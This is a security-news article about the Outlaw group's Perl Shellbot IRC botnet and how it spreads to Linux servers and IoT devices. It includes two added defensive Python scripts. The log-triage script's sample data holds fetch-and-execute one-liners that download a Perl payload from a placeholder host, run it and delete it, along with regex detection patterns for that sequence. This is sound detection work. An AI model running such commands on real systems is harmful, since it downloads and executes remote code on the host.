Experts from a cybersecurity firm have discovered an IRC bot nicknamed Shellbot, built using Perl Shellbot
Reports from digital forensics and cybersecurity specialists at the International Institute of Cyber Security state that a new botnet has been discovered that mainly attacks Linux servers and vulnerable Internet of Things (IoT) devices. According to the reports, the malware is distributed by a threat group called Outlaw and also targets Windows operating systems.
“We discovered an operation of a hacking group, we have identified them as ‘Outlaw’ (derived from the Romanian word ‘haiduc’, the hacking tool that the group uses primarily), which implies the use of an IRC bot created with the help of Perl Shellbot”, reported the digital forensics experts in an advisory.
“The group distributes the bot exploiting a common command-injection vulnerability in Internet of Things (IoT) devices and Linux servers. Further research indicates that the threat can also affect Windows-based environments and even Android devices”, the expert report continues.
In recent attacks, the hackers compromised the FTP servers of a Japanese art institution and a government site in Bangladesh. The attackers linked the compromised servers to a high-availability cluster to host an IRC gatekeeper and control the botnet. The bot had previously been distributed through an exploit targeting the ShellShock vulnerability. In October, computer security and digital forensics experts noted that the bot was spreading through the Drupalgeddon2 vulnerability.
In the latest series of attacks analyzed, the attackers used hosts they had previously compromised through brute-force attacks to distribute the threat and target Ubuntu and Android devices.
Analysis of the command-and-control (C&C) traffic gave the security investigators information about the IRC channels used; in the first infection, 142 hosts were present on the IRC channel.
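Counting the hosts on a channel from captured C&C traffic comes down to parsing the server's RPL_NAMREPLY (numeric 353) lines, which list channel members, possibly split across several replies and carrying mode prefixes such as @ or +. The following is an added example written for this article, not code from the researchers; the IRC server name, channel names and nicks in the sample are constructed.

```python
import re
from collections import defaultdict

# Constructed sample of server-to-client IRC traffic, as it might be
# reassembled from a C&C capture. Server, channel and nick names are made up.
SAMPLE_IRC = """\
:irc.example.invalid 001 bot1 :Welcome to the network
:irc.example.invalid 353 bot1 = #ctrl :@admin bot1 bot2 +bot3
:irc.example.invalid 353 bot1 = #ctrl :bot4 bot5 bot2
:irc.example.invalid 366 bot1 #ctrl :End of /NAMES list.
:irc.example.invalid 353 bot1 = #other :bot9
:irc.example.invalid 366 bot1 #other :End of /NAMES list.
PING :irc.example.invalid
"""

# RPL_NAMREPLY: ":<server> 353 <me> <=|*|@> <channel> :<space-separated nicks>"
NAMES_REPLY = re.compile(r"^:(\S+) 353 (\S+) [=*@] (#\S+) :(.*)$")
# Channel membership prefixes (owner, admin, op, half-op, voice) to strip.
PREFIXES = "~&@%+"


def channel_members(text):
    """Return {channel: sorted list of unique nicks} from raw IRC server lines."""
    members = defaultdict(set)
    for line in text.splitlines():
        m = NAMES_REPLY.match(line.rstrip("\r"))
        if not m:
            continue  # not a NAMES reply (welcome, PING, end-of-names, ...)
        channel, names = m.group(3), m.group(4)
        for name in names.split():
            # A nick may repeat across split replies; the set deduplicates it.
            members[channel].add(name.lstrip(PREFIXES))
    return {ch: sorted(nicks) for ch, nicks in members.items()}


def channel_counts(text):
    """Number of distinct hosts (nicks) seen per channel."""
    return {ch: len(nicks) for ch, nicks in channel_members(text).items()}


if __name__ == "__main__":
    for channel, count in channel_counts(SAMPLE_IRC).items():
        print(f"{channel}: {count} hosts")
```

Each bot usually joins with a generated nick, so the distinct-nick count per channel is a reasonable first estimate of infected hosts; comparing it against later captures shows how the botnet grows or shrinks.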
The operator of the IRC channel controls the Shellbot backdoor and can instruct it to perform several actions, including port scans, various types of distributed denial-of-service (DDoS) attacks, file downloads, and collecting information about the infected system.
The attack chain starts with the malware running a command on the target system to verify that it accepts commands from the command-line interface (CLI). The malicious code then changes the working directory to “/tmp”, downloads a payload and executes it with the Perl interpreter. In the final step the payload is deleted, leaving no trace on the attacked system.
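The staging sequence just described (change to /tmp, fetch a file, run it with perl, delete it) is a useful detection signature for web-server or honeypot command logs. The following triage script is an added example for this article, not code from the researchers; the logged commands are constructed, the download host is a placeholder, and the stage names and threshold are choices made here.

```python
import re

# Constructed honeypot log: one injected shell command per line.
# The download host is a placeholder, not a real indicator.
SAMPLE_COMMANDS = [
    "cd /tmp; wget http://placeholder.invalid/x.pl -O x.pl; perl x.pl; rm -f x.pl",
    "cd /tmp || cd /var/tmp; curl -s http://placeholder.invalid/s > p; perl p; rm -rf p",
    "ls -la /var/www",
    'cd /tmp; perl -e "print 1"',
]

# Each stage of the sequence described in the text, as a regex over the command.
STAGES = {
    "cd_tmp": re.compile(r"\bcd\s+/(?:var/)?tmp\b"),   # move to a world-writable dir
    "fetch": re.compile(r"\b(?:wget|curl)\b"),        # download the payload
    "perl": re.compile(r"\bperl\b"),                  # execute with the Perl interpreter
    "cleanup": re.compile(r"\brm\s+-[rf]+\b"),        # remove the payload afterwards
}


def stage_hits(cmd):
    """Names of the stages present in one command line, in sequence order."""
    return [name for name, rx in STAGES.items() if rx.search(cmd)]


def is_shellbot_like(cmd, min_stages=3):
    """Flag a command that runs perl and shows at least min_stages of the sequence.

    Requiring the perl stage keeps ordinary 'cd /tmp; wget ...' installers
    from matching; the threshold tolerates a missing or reordered stage.
    """
    hits = stage_hits(cmd)
    return "perl" in hits and len(hits) >= min_stages


def triage(commands):
    """Return (command, matched stages) for every flagged command."""
    return [(cmd, stage_hits(cmd)) for cmd in commands if is_shellbot_like(cmd)]


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_COMMANDS):
        print(f"FLAGGED [{', '.join(hits)}]: {cmd}")
```

Because the payload removes itself, the command log is often the only artifact left on the host, which is why matching on the full stage pattern rather than on a file hash is the more durable detection.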
The investigators were able to download the files used by the threat actors, using the credentials found in one of the commands injected into the honeypots. They noted that the contents of the files on the server were modified frequently, and that files were modified, deleted and added mainly during the day and the early afternoon, Central European time.